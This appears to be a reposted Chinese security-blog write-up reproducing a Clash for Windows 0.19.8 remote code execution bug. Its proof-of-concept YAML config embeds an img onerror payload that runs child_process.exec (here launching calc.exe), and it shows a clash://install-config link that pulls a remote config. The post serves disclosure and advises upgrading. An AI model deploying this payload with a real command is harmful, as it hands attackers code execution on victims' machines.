Clash_for_Windows远程代码执行漏洞

admin 2022年4月6日14:32:33评论1 views字数 935阅读3分7秒阅读模式

漏洞复现

本次poc及复现参考链接

https://github.com/Fndroid/clash_for_windows_pkg/issues/2710

版本:0.19.8

poc

port: 7890
socks-port: 7891
allow-lan: true
mode: Rule
log-level: info
external-controller: :9090
proxies:
- name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
type: socks5
server: 127.0.0.1
port: "17938"
skip-cert-verify: true
- name: abc
type: socks5
server: 127.0.0.1
port: "8088"
skip-cert-verify: true

proxy-groups:
-
name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
type: select
proxies:
- a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>

创建文件poc.yaml并导入

点击clash里的import

Clash_for_Windows远程代码执行漏洞
image-20220225203545197

导入完成之后我们直接点击proxies中的列表即可

Clash_for_Windows远程代码执行漏洞
image-20220225203831429
Clash_for_Windows远程代码执行漏洞
image-20220225203929622

还有一种利用方式

clash://install-config?url=http%3A%2F%2F1.1.1.1%3A8888%2F1.txt&name=RCE
Clash_for_Windows远程代码执行漏洞
image-20220225210127088

新版本已修复请用户前往升级

最新版本https://github.com/Fndroid/clash_for_windows_pkg/releases/tag/0.19.10

end

Clash_for_Windows远程代码执行漏洞

原文始发于微信公众号(XK Team):Clash_for_Windows远程代码执行漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月6日14:32:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Clash_for_Windows远程代码执行漏洞http://cn-sec.com/archives/880125.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息